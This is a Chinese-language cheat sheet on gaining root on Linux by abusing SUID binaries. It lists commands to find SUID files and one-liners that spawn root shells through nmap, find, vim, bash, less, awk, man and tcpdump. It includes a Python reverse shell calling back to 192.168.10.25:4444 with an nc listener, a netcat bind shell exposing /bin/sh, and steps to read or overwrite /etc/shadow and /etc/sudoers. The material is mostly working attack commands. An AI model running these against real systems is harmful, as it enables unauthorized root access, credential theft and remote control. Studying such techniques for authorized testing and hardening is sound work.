Linux提权之Suid提权
SUID是linux的一种权限机制
具有这种权限的文件会在其执行的时候,使调用者暂时获得该文件拥有者的权限。如果拥有SUID权限,那么就可以利用系统中的二进制文件和工具进行root提权
已知的可用于提权的linux可行性文件列表如下:
NmapVimfindBashMoreLessNanocp
使用如下命令可以发现系统上运行的所有SUID可执行的文件 命令将查找具有root权限的SUID的文件
find / -user root -perm -4000 -print 2>/dev/null
find / -perm -u=s -type f 2>/dev/null
find / -user root -perm -4000 -exec ls -ldb {} \;
1.Nmap
较旧版本的Nmap(2.02-5.21)具有交互模式 允许用户执行shell命令
由于Nmap在使用root权限执行的二进制文件列表中,因此可以使用交互式控制台来运行具有相同权限的shell
nmap -v #查看nmap的版本
nmap --interactive #nmap的交互模式
如下命令可以提供一个提升的shell
nmap> !sh
sh-3.2# whoami
root
也可以通过Metasploit模块对Nmap的二进制文件进行权限提升
use exploit/unix/local/setuid_nmap
2.Find
如果find命令也是以suid权限运行的话 那么通过find执行的
所有命令都会以root权限执行
touch pentestlab
find pentestlab -exec whoami \;
以上也可以使用
/usr/bin/find xbw -exec whoami \; #xbw可以是任意的文件 这并不重要
进阶1:甚至可以用root权限身份借助python反弹shell
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.10.25",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);' #反弹一个sh类型的shell
即:
/usr/bin/find xbw -exec python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.10.25",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);' \;
黑客kali端
nc -lvp 4444 #监听相应端口的信息
进阶2:大部分Linux操作系统都安装了netcat 也可以被利用来提升权限到root
通过nc把root权限反弹到其他用户上去执行root命令
touch pentestlab
#find pentestlab -exec whoami \;
find pentestlab -exec netcat -lvp 5555 -e /bin/sh \;
netcat 192.168.1.189 5555
cat /etc/shadow
3.VIM
vim是linux下的文本编辑器。如果以suid运行,则会继承root用户的权限,可以读取系统上的所有文件
vim.tiny /etc/shadow
vim.tiny /etc/passwd
vim.tiny
# Press ESC key
:set shell=/bin/sh
:shell
4.Bash
以下命令将以root权限打开一个bash shell
bash -p
bash-3.2# id
uid=1002(service) gid=1002(service) euid=0(root) groups=1002(service)
5.Less
6.More
Less和More都可以执行用来提权 本质和vim一样 都是查看文件内容的
less /etc/passwd
!/bin/sh
more /home/pelle/myfile
!/bin/bash
7.cp
使用cp覆盖 /etc/shadow
8.mv
使用mv覆盖 /etc/shadow 或者 /etc/sudoers
9.awk
awk 'BEGIN {system("/bin/bash")}'
10.man
man passwd
!/bin/bash
11.python/perl/ruby/lua/etc
perl
exec "/bin/bash";
python
import os
os.system("/bin/bash")
12.tcpdump
echo $'id\ncat /etc/shadow' > /tmp/.test
chmod +x /tmp/.test
sudo tcpdump -ln -i eth0 -w /dev/null -W 1 -G 1 -z /tmp/.test -Z root